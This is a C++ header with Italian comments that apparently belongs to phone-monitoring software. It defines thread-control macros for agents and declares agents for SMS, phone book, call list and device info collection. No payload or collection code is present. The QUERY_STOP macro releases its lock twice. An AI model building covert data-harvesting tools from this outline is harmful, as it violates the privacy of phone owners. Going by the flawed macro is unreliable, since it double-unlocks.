#include "Common.h"
#include "Sms.h"
#include <exception>
using namespace std;

#ifndef __Agents_h__
#define __Agents_h__

#define I_AM_ALIVE 	WAIT_AND_SIGNAL(statusObj->hAgentsLock); \
	for(iter = agents->begin(); iter != agents->end(); iter++){ \
	if((*iter)->uAgentId == MyID){ \
	(*iter)->uAgentStatus = AGENT_RUNNING; \
	break; \
	} \
	} \
	UNLOCK(statusObj->hAgentsLock);

#define STOP_ME 	WAIT_AND_SIGNAL(statusObj->hAgentsLock); \
	for(iter = agents->begin(); iter != agents->end(); iter++){ \
	if((*iter)->uAgentId == MyID){ \
	(*iter)->uAgentStatus = AGENT_STOPPED; \
	(*iter)->uCommand = 0; \
	UNLOCK(statusObj->hAgentsLock); \
	return TRUE; \
	} \
	} \
	UNLOCK(statusObj->hAgentsLock);

#define WAIT_FOR_STOP 	BOOL bStop = FALSE; \
	while(bStop == FALSE){ \
	WAIT_AND_SIGNAL(statusObj->hAgentsLock); \
	for(iter = agents->begin(); iter != agents->end(); iter++){ \
	if((*iter)->uAgentId == MyID && (*iter)->uCommand == AGENT_STOP){ \
	bStop = TRUE; \
	break; \
	} \
	} \
	UNLOCK(statusObj->hAgentsLock); \
	MiniSleep(500); \
	}

#define CHECK_FOR_STOP	WAIT_AND_SIGNAL(statusObj->hAgentsLock); \
	for(iter = agents->begin(); iter != agents->end(); iter++){ \
	if((*iter)->uAgentId == MyID && (*iter)->uCommand == AGENT_STOP){ \
	(*iter)->uAgentStatus = AGENT_STOPPED; \
	(*iter)->uCommand = 0; \
	UNLOCK(statusObj->hAgentsLock); \
	return TRUE; \
	} \
	} \
	UNLOCK(statusObj->hAgentsLock);

// Valorizza x a TRUE se il thread e' stato marcato per lo STOP, a FALSE altrimenti.
// Questa funzione, a differenza della CHECK_FOR_STOP NON ferma il thread!
#define QUERY_STOP(x) 	WAIT_AND_SIGNAL(statusObj->hAgentsLock); \
	x = FALSE; \
	for(iter = agents->begin(); iter != agents->end(); iter++){ \
	if((*iter)->uAgentId == MyID && (*iter)->uCommand == AGENT_STOP){ \
	UNLOCK(statusObj->hAgentsLock); \
	x = TRUE; \
	break; \
	} \
	} \
	UNLOCK(statusObj->hAgentsLock);


#define COMMON_DATA(x) 	UINT MyID = x; \
	Status *statusObj = Status::self(); \
	list<AgentStruct *>::iterator iter; \
	list<AgentStruct *> *agents; \
	pAgentStruct myData = (pAgentStruct)lpParam;


DWORD WINAPI SmsAgent(LPVOID lpParam);
DWORD WINAPI PhoneBookAgent(LPVOID lpParam);
DWORD WINAPI CallListAgent(LPVOID lpParam);
DWORD WINAPI DeviceInfoAgent(LPVOID lpParam);
VOID FAR PASCAL lineCallbackFunc(DWORD hDevice, DWORD dwMsg, DWORD dwCallbackInstance, 
								 DWORD dwParam1, DWORD dwParam2, DWORD dwParam3);
#endif